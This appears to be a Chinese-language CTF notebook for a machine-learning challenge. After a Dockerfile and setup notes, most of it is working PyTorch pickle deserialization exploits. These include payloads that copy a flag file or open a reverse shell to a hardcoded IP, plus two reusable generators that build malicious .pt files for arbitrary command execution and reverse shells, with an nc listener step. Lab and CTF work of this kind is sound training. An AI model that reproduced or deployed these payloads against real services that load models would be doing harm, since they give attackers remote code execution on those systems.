Dockerfile太慢可以用
FROM python:3.8-slim
WORKDIR /app
RUN apt-get update && apt-get install -y --no-install-recommends ca-certificates && \
rm -rf /var/lib/apt/lists/*
COPY requirements.txt .
RUN pip install --no-cache-dir --trusted-host mirrors.aliyun.com \
-i http://mirrors.aliyun.com/pypi/simple/ -r requirements.txt
COPY app/ /app/
ENV FLASK_APP=app.py
EXPOSE 5000
ENTRYPOINT ["flask"]
CMD ["run", "--host", "0.0.0.0"]
记得床架一下uploads文件夹
docker exec persuade_ml_ctf_challenge mkdir -p /app/uploads
PyTorch pickle 反序列化漏洞
import torch
class Evil:
def __reduce__(self):
code = """
flag = open('/app/InternalFolder/Flag.txt').read()
open('/app/uploads/flag.txt', 'w').write(flag)
"""
return (exec, (code,))
torch.save(Evil(), 'exploit.pt')
print("[+] exploit.pt 已生成")
import torch
class Evil:
def __reduce__(self):
# 反弹 shell 到 Kali(换成你的 Kali IP)
code = """
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.21.137",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
"""
return (exec, (code,))
torch.save(Evil(), 'shell_exploit.pt')
print("[+] shell_exploit.pt 已生成")
print("[*] 确保 Kali 已执行: nc -lvnp 4444")
工具化
Pt
我在home下面写了一个flag
#!/usr/bin/env python3
"""
恶意 PyTorch 模型生成器
用法:
# 读取文件并写入目标
python3 malicious_pt_generator.py --read-file /app/InternalFolder/Flag.txt --write-to /app/uploads/flag.txt
# 执行系统命令
python3 malicious_pt_generator.py --cmd "id; cat /app/InternalFolder/Flag.txt"
# 保存为指定文件名
python3 malicious_pt_generator.py --read-file /flag --write-to /tmp/out.txt -o my_exploit.pt
"""
import torch
import argparse
import sys
class MaliciousPickle:
"""恶意 Pickle 类 ------ 在 torch.load() 时执行代码"""
def __init__(self, code):
self.code = code
def __reduce__(self):
return (exec, (self.code,))
def build_read_file(src, dst):
"""读取文件并复制到目标"""
return f"""
import shutil
shutil.copy("{src}", "{dst}")
"""
def build_cmd(command):
"""执行系统命令"""
return f"""
import os
os.system("{command}")
"""
def build_python_exec(code_lines):
"""执行多行 Python 代码"""
return "\n".join(code_lines)
def generate(code, output):
"""生成恶意 .pt 文件"""
payload = MaliciousPickle(code)
torch.save(payload, output)
print(f"[+] 恶意模型已生成: {output}")
def main():
parser = argparse.ArgumentParser(
description="恶意 PyTorch 模型生成器",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
示例:
python3 malicious_pt_generator.py --read-file /app/InternalFolder/Flag.txt --write-to /app/uploads/flag.txt
python3 malicious_pt_generator.py --cmd "ls -la /app/"
python3 malicious_pt_generator.py --read-file /flag --write-to /tmp/out.txt -o sploit.pt
"""
)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--read-file', metavar='SRC', help='要读取的文件路径')
group.add_argument('--cmd', metavar='CMD', help='要执行的系统命令')
parser.add_argument('--write-to', metavar='DST', help='写入目标路径(配合 --read-file)')
parser.add_argument('-o', '--output', default='exploit.pt', help='输出文件名 (默认: exploit.pt)')
args = parser.parse_args()
if args.read_file:
dst = args.write_to if args.write_to else '/tmp/flag_output.txt'
code = build_read_file(args.read_file, dst)
print(f"[*] 读取: {args.read_file}")
print(f"[*] 写入: {dst}")
print(f"[*] 上传后检查: {dst}")
elif args.cmd:
code = build_cmd(args.cmd)
print(f"[*] 命令: {args.cmd}")
generate(code, args.output)
if __name__ == '__main__':
main()
上传解析之后
Shell
#!/usr/bin/env python3
"""
反弹 Shell Payload 生成器
用法:
python3 reverse_shell_generator.py 192.168.1.100 4444
python3 reverse_shell_generator.py 10.0.0.1 9999 -o shell.pt
"""
import torch
import argparse
import sys
import textwrap
class MaliciousPickle:
"""恶意 Pickle 类 ------ 在 torch.load() 时执行代码"""
def __init__(self, code):
self.code = code
def __reduce__(self):
return (exec, (self.code,))
# ==================== Payload 模板 ====================
PAYLOAD_BASH = textwrap.dedent("""
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{ip}",{port}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
""").strip()
PAYLOAD_PYTHON = textwrap.dedent("""
import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{ip}",{port}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
""").strip()
def generate(ip, port, output, mode='bash'):
"""生成反弹 shell 的恶意 .pt 文件"""
template = PAYLOAD_BASH if mode == 'bash' else PAYLOAD_PYTHON
code = template.format(ip=ip, port=port)
payload = MaliciousPickle(code)
torch.save(payload, output)
print(f"[+] 反弹 Shell Payload 已生成: {output}")
print(f"[*] 目标: {ip}:{port}")
print(f"[*] 模式: {'bash (subprocess)' if mode == 'bash' else 'python (pty)'}")
print(f"\n[!] 在 Kali 上开启监听:")
print(f" nc -lvnp {port}")
print(f"\n[!] 上传 {output} 到靶场,触发 torch.load() 即可获得 shell")
def main():
parser = argparse.ArgumentParser(
description="反弹 Shell Payload 生成器 (PyTorch Pickle)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
示例:
python3 reverse_shell_generator.py 192.168.1.100 4444
python3 reverse_shell_generator.py 10.0.0.1 9999 -o shell.pt --python
"""
)
parser.add_argument('ip', help='回连 IP (Kali 的 IP)')
parser.add_argument('port', type=int, help='回连端口')
parser.add_argument('-o', '--output', default='reverse_shell.pt', help='输出文件名 (默认: reverse_shell.pt)')
parser.add_argument('--python', action='store_true', help='使用 Python pty 模式 (兼容性更好)')
args = parser.parse_args()
mode = 'python' if args.python else 'bash'
generate(args.ip, args.port, args.output, mode)
if __name__ == '__main__':
main()
